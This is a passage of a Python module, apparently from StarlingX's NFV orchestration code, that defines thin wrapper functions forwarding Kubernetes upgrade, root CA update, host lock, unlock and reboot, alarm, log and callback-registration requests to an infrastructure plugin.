cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_upgrade_download_images',
callback=callback)
return cmd_id
def nfvi_kube_upgrade_networking(callback):
"""
Kube Upgrade Networking
"""
cmd_id = _infrastructure_plugin.invoke_plugin('kube_upgrade_networking',
callback=callback)
return cmd_id
def nfvi_kube_upgrade_start(to_version, force, alarm_ignore_list, callback):
"""
Kube Upgrade Start
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_upgrade_start',
to_version=to_version,
force=force,
alarm_ignore_list=alarm_ignore_list,
callback=callback)
return cmd_id
def nfvi_get_kube_host_upgrade_list(callback):
"""
Get kube host upgrade list
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_kube_host_upgrade_list',
callback=callback)
return cmd_id
def nfvi_get_kube_rootca_host_update_list(callback):
"""
Get kube rootca update host list
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'get_kube_rootca_host_update_list',
callback=callback)
return cmd_id
def nfvi_get_kube_rootca_update(callback):
"""
Get kube rootca update
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_kube_rootca_update',
callback=callback)
return cmd_id
def nfvi_get_kube_upgrade(callback):
"""
Get kube upgrade
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_kube_upgrade',
callback=callback)
return cmd_id
def nfvi_get_kube_version_list(callback):
"""
Get kube version list
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_kube_version_list',
callback=callback)
return cmd_id
def nfvi_get_upgrade(callback):
"""
Get upgrade
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_upgrade',
callback=callback)
return cmd_id
def nfvi_upgrade_start(callback):
"""
Upgrade start
"""
cmd_id = _infrastructure_plugin.invoke_plugin('upgrade_start',
callback=callback)
return cmd_id
def nfvi_upgrade_activate(callback):
"""
Upgrade activate
"""
cmd_id = _infrastructure_plugin.invoke_plugin('upgrade_activate',
callback=callback)
return cmd_id
def nfvi_upgrade_complete(callback):
"""
Upgrade complete
"""
cmd_id = _infrastructure_plugin.invoke_plugin('upgrade_complete',
callback=callback)
return cmd_id
def nfvi_disable_container_host_services(host_uuid, host_name,
host_personality, host_offline,
callback):
"""
Disable container services on a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'disable_host_services',
host_uuid, host_name, host_personality, host_offline,
callback=callback)
return cmd_id
def nfvi_enable_container_host_services(host_uuid, host_name,
host_personality,
callback):
"""
Enable container services on a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'enable_host_services',
host_uuid, host_name, host_personality,
callback=callback)
return cmd_id
def nfvi_delete_container_host_services(host_uuid, host_name,
host_personality,
callback):
"""
Delete container services on a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'delete_host_services',
host_uuid, host_name, host_personality,
callback=callback)
return cmd_id
def nfvi_notify_host_services_enabled(host_uuid, host_name, callback):
"""
Notify host services are enabled
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_enabled', host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_notify_host_services_disabled(host_uuid, host_name, callback):
"""
Notify host services are disabled
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_disabled', host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_notify_host_services_disable_extend(host_uuid, host_name, callback):
"""
Notify host services disable extend timeout
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_disable_extend', host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_notify_host_services_disable_failed(host_uuid, host_name,
reason, callback):
"""
Notify host services disable failed
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_disable_failed', host_uuid, host_name,
reason, callback=callback)
return cmd_id
def nfvi_notify_host_services_deleted(host_uuid, host_name, callback):
"""
Notify host services have been deleted
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_deleted', host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_notify_host_services_delete_failed(host_uuid, host_name,
reason, callback):
"""
Notify host services delete failed
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_delete_failed', host_uuid, host_name,
reason, callback=callback)
return cmd_id
def nfvi_notify_host_failed(host_uuid, host_name, host_personality, callback):
"""
Notify host is failed
"""
cmd_id = _infrastructure_plugin.invoke_plugin('notify_host_failed',
host_uuid, host_name,
host_personality,
callback=callback)
return cmd_id
def nfvi_lock_host(host_uuid, host_name, callback):
"""
Lock a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('lock_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_unlock_host(host_uuid, host_name, callback):
"""
Unlock a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('unlock_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_reboot_host(host_uuid, host_name, callback):
"""
Reboot a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('reboot_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_upgrade_host(host_uuid, host_name, callback):
"""
Upgrade a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('upgrade_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_swact_from_host(host_uuid, host_name, callback):
"""
Swact from a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('swact_from_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_get_alarms(callback):
"""
Get alarms
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_alarms', callback=callback)
return cmd_id
def nfvi_get_logs(start_period, end_period, callback):
"""
Get logs
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_logs', start_period,
end_period, callback=callback)
return cmd_id
def nfvi_get_alarm_history(start_period, end_period, callback):
"""
Get logs
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_alarm_history', start_period,
end_period, callback=callback)
return cmd_id
def nfvi_get_terminating_pods(host_name, callback):
"""
Get terminating pods
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_terminating_pods',
host_name, callback=callback)
return cmd_id
def nfvi_register_host_add_callback(callback):
"""
Register for host add notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_add_callback',
callback=callback)
def nfvi_register_host_action_callback(callback):
"""
Register for host action notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_action_callback',
callback=callback)
def nfvi_register_host_state_change_callback(callback):
"""
Register for host state change notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_state_change_callback',
callback=callback)
def nfvi_register_host_get_callback(callback):
"""
Register for host get notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_get_callback',
callback=callback)
def nfvi_register_host_upgrade_callback(callback):
"""
Register for host upgrade notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_upgrade_callback',
callback=callback)
def nfvi_register_host_update_callback(callback):
"""
Register for host update notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_update_callback',
callback=callback)
def nfvi_register_host_notification_callback(callback):
"""
Register for host notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_notification_callback',
callback=callback)
def nfvi_register_sw_update_get_callback(callback):
"""
Register for software update get notifications
"""
_infrastructure_plugin.invoke_plugin('register_sw_update_get_callback',
callback=callback)
def nfvi_infrastructure_initialize(config, pool):
"""
Initialize the NFVI infrastructure package
"""
global _infrastructure_plugin
_infrastructure_plugin = NFVIInfrastructurePlugin(config['namespace'], pool)
_infrastructure_plugin.initialize(config['config_file'])
def nfvi_infrastructure_finalize():
"""
Finalize the NFVI infrastructure package
"""
if _infrastructure_plugin is not None:
_infrastructure_plugin.finalize()
| 29.373942
| 84
| 0.619297
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.